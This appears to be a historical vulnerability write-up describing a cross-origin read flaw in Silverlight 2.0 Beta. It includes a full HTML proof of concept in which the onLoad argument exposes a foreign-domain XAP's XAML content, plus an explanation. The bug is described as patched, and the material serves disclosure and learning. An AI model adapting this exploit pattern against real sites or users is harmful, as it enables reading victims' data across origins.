I was lucky to find this one while testing Silverlight 2.0 Beta. The normal way to access a Silverlight control’s XAML DOM from JavaScript is through document.getElementById("SilverlightControl").Content — but if the XAP file lives on a different domain, that access is blocked. What I noticed was that the onLoad event fires regardless of where the XAP is hosted, and its argument is the userControl object, which gives full .Content access. No cross-origin check was performed on that path.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>xDom_Silverlight_OnLoad_Argument</title>
<style type="text/css">
body {text-align:center;font-family:Verdana;font-size:12px;background-Color:#ffffff;color:#2d2d2d;}
h1 {font-size:22px;}
span {font-weight: bold;color:blue;}
div {text-align:left;}
address {text-align:left;}
</style>
</head>
<body>
<h1>xDom_Silverlight_OnLoad_Argument</h1>
<script language="JavaScript">
function onSilverlightLoad(userControl)
{
alert("XAML tbText1 Content:\n\n" + userControl.Content.FindName("tbText1").text);
}
</script>
<object data="data:application/x-silverlight," type="application/x-silverlight-2-b1" width="560" height="150">
<!-- Change the URL here so it points to the xap on a different domain. -->
<param name="source" value="http://www.iframe.com/crash/07/crossDomain.xap"/>
<param name="onLoad" value="onSilverlightLoad" />
<param name="enableHtmlAccess" value="true" />
<param name="background" value="white" />
</object>
<br /><small>Tested on Silverlight v.2.0.<b>30220</b>.0</small>
<br /><br />
<hr />
<div>
<br />
<span>Effect:</span> UXSS. We can load/read an external XAP/XAML and iterate through its objects, even when hosted on a different domain.
No cooperation is needed.
<br /><br />
<span>Preparation:</span> copy the crossDomain.xap to a different domain. Then, edit this html file and change the source of the
Silverlight object so it points to crossDomain.xap on the other domain.
<br /><br />
<span>Explanation:</span> usually, you can access XAML DOM via the <i>document.getElementById("SilverlightControl")<b>.Content</b></i> object. However,
if you load a control (XAP) that <u>is not on the same domain</u>, you won't be able to access it.<br />
Now, every control (no matter which domain) will fire the <b>onLoad</b> event, passing a convenient argument as a parameter: the <b>userControl</b> object,
which we can inmediately use to access the <b>.Content</b> and read it at will.
<br /><br />
<hr /><br />
<span>Basic Code:</span>
<br /><br />
<code>
<object data="data:application/x-silverlight," type="application/x-silverlight-2-b1"><br />
<param name="source" value="http://<span style="color:red">differentdomain.com</span>/crossDomain.xap"/><br />
<param name="<span>onLoad</span>" value="<span>onSilverlightLoad</span>" /><br />
<param name=""<span style="color:green">enableHtmlAccess</span>" value="true" /><br />
</object><br /><br />
function <span>onSilverlightLoad</span>(<span style="color:brown">userControl</span>)<br />
{<br />
alert(<span style="color:brown">userControl</span>.Content.FindName("tbText1").text);<br />
}<br />
</code>
</div>
</body>
</html>The key insight is that the onLoad callback receives userControl as a parameter, and that object already has .Content access baked in — the cross-origin check only blocked access via the DOM element reference, not via this event argument. Any attacker-controlled page could load a victim’s XAP from any domain and freely read its XAML DOM objects, including any data bound to UI elements. No user interaction was required. This was tested on Silverlight 2.0.30220.0.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.